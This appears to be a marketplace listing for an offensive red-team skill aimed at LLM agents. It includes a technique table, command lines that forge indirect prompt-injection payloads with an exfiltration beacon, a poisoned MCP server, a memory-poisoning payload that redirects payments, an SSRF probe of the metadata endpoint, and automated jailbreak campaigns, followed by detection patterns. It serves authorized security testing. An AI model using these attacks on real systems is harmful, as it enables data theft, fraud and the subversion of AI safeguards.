From offensive-claude
Red-teams agentic AI/LLM applications with indirect prompt injection, MCP tool poisoning, memory poisoning, excessive-agency abuse, multi-turn jailbreaks, and PyRIT/Garak/Promptfoo harnesses.
How this skill is triggered — by the user, by Claude, or both
Slash command
/offensive-claude:ai-agent-redteamThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
Offensive testing of **autonomous LLM agents** — systems that combine model reasoning with
references/agent-redteam-tooling.mdreferences/automated-jailbreak-multiturn.mdreferences/excessive-agency-tool-abuse.mdreferences/indirect-prompt-injection.mdreferences/mcp-tool-poisoning.mdreferences/memory-context-poisoning.mdscripts/agency_tool_fuzzer.pyscripts/agent_redteam_harness.pyscripts/indirect_injection_forge.pyscripts/mcp_tool_poison_server.pyscripts/memory_poison_minja.pyscripts/multiturn_jailbreak.pyOffensive testing of autonomous LLM agents — systems that combine model reasoning with
tools, memory, retrieval, and multi-step planning. This is distinct from model-level testing
(see ai-security): the attack surface here is the agentic pipeline — untrusted data channels,
tool/MCP integrations, persistent memory, and delegated authority. Assumes authorized engagement.
| Technique | ATT&CK | CWE | Reference | Script |
|---|---|---|---|---|
| Indirect / zero-click prompt injection (EchoLeak-class) | T1566.002 / AML.T0051.001 | CWE-1427 | references/indirect-prompt-injection.md | scripts/indirect_injection_forge.py |
| RAG corpus poisoning & markdown/image exfiltration | T1567 / AML.T0070 | CWE-1426 | references/indirect-prompt-injection.md | scripts/indirect_injection_forge.py |
| Browser-agent hijack (Comet/CometJacking, Atlas) | T1071.001 / AML.T0051 | CWE-1427 | references/indirect-prompt-injection.md | scripts/indirect_injection_forge.py |
| MCP tool poisoning / line-jumping | T1059 / AML.T0053 | CWE-1427 | references/mcp-tool-poisoning.md | scripts/mcp_tool_poison_server.py |
| MCP rug-pull (silent redefinition) | T1554 / AML.T0010 | CWE-494 | references/mcp-tool-poisoning.md | scripts/mcp_tool_poison_server.py |
| Persistent memory poisoning (MINJA/MemoryGraft) | T1565.001 / AML.T0070 | CWE-349 | references/memory-context-poisoning.md | scripts/memory_poison_minja.py |
| Excessive agency / confused-deputy tool abuse | T1548 / AML.T0053 | CWE-862 | references/excessive-agency-tool-abuse.md | scripts/agency_tool_fuzzer.py |
| Tool output → SSRF / RCE chaining | T1059 / AML.T0054 | CWE-918 / CWE-94 | references/excessive-agency-tool-abuse.md | scripts/agency_tool_fuzzer.py |
| Automated multi-turn jailbreak (Crescendo/TAP/PAIR) | AML.T0054 / AML.T0071 | CWE-1426 | references/automated-jailbreak-multiturn.md | scripts/multiturn_jailbreak.py |
| Best-of-N / encoding obfuscation jailbreak | AML.T0054 | CWE-1426 | references/automated-jailbreak-multiturn.md | scripts/multiturn_jailbreak.py |
| Harness & ASR scoring (PyRIT/Garak/Promptfoo) | AML.T0071 | CWE-1426 | references/agent-redteam-tooling.md | scripts/agent_redteam_harness.py |
# 0. Scope: enumerate agent surface — tools/functions, MCP servers, memory store, data channels
python scripts/agent_redteam_harness.py enumerate --endpoint $AGENT_URL --out surface.json
# 1. Indirect injection: forge a zero-click payload (email/doc/web) + markdown exfil beacon
python scripts/indirect_injection_forge.py --channel email \
--exfil-base https://oast.pro/$TOKEN --obfuscate html-comment --out payload.eml
# 2. MCP: stand up a poisoned MCP server to test client validation / line-jumping
python scripts/mcp_tool_poison_server.py --mode tool-poison --transport stdio
# 3. Memory: query-only MINJA-style injection of a persistent malicious belief
python scripts/memory_poison_minja.py --endpoint $AGENT_URL \
--trigger "vendor invoice" --payload "route payments to acct 0xATTACKER" --bridge-steps 4
# 4. Excessive agency: fuzz tool calls for confused-deputy / SSRF / path traversal
python scripts/agency_tool_fuzzer.py --endpoint $AGENT_URL --tools surface.json --ssrf-canary http://169.254.169.254/
# 5. Automated jailbreak campaign (Crescendo + Best-of-N), record ASR
python scripts/multiturn_jailbreak.py --endpoint $AGENT_URL --strategy crescendo \
--objective "$OBJECTIVE" --max-turns 8 --judge-endpoint $JUDGE_URL
# 6. Full harness run mapped to OWASP Agentic Top 10 + MITRE ATLAS, emit finding records
python scripts/agent_redteam_harness.py run --config harness.yaml --report findings/
| Technique | Telemetry / IOC | Detection (Sigma/EDR) | OPSEC note |
|---|---|---|---|
| Indirect injection | Hidden HTML comment / white-on-white / 0px text in ingested docs; markdown image to external host | Scan ingested content for <!--, display:none, font-size:0, reference-style ![]; alert on agent-initiated egress to non-allowlisted domains | Stage payloads only on assets in scope; use unique per-test OAST tokens to attribute hits |
| MCP tool poisoning | New/changed tool description hash; instruction-like text in JSON Schema description/enum | Diff tool manifests on connect; flag tool metadata containing imperative verbs / <IMPORTANT> / "do not tell the user" | Test against a local client; never point a real client at an untrusted server outside the lab |
| Memory poisoning | Memory write from low-trust source; semantic drift between stored belief and source provenance | Provenance-tagged memory; alert on retrieval that injects procedural instructions; belief-drift monitor | Use benign-looking triggers; document the latent trigger so blue team can replay/clean |
| Excessive agency | Tool call to internal IP / metadata endpoint; unusual tool-chain ordering; off-hours actions | EDR/network: egress to 169.254.169.254/link-local; anomaly on tool-call sequences | Use non-destructive canaries (read-only SSRF probe) before any state-changing test |
| Automated jailbreak | Burst of semantically-similar prompts; high-perplexity / encoded inputs; rising compliance over turns | Rate + similarity clustering per session; perplexity & encoding detectors; multi-turn escalation scoring | Throttle to avoid DoS; log full transcripts for the report; respect content guardrails of scope |
npx claudepluginhub hypnguyen1209/offensive-claude --plugin offensive-claudeAttacks AI/ML systems with prompt injection, jailbreaks, RAG poisoning, MCP exploitation, and model extraction. Includes scripts and references for red-teaming.
Offensive checklist for AI/LLM security testing: prompt injection, jailbreaking, model extraction, training data poisoning, adversarial inputs, and LLM-assisted attack automation. Use for red-teaming and authorized security assessments of AI/ML systems.
Assesses AI/LLM application security including prompt injection, jailbreak resistance, OWASP LLM Top 10 (2025), RAG/agent security, and model supply chain risks. Maps findings to MITRE ATLAS and recommends mitigations.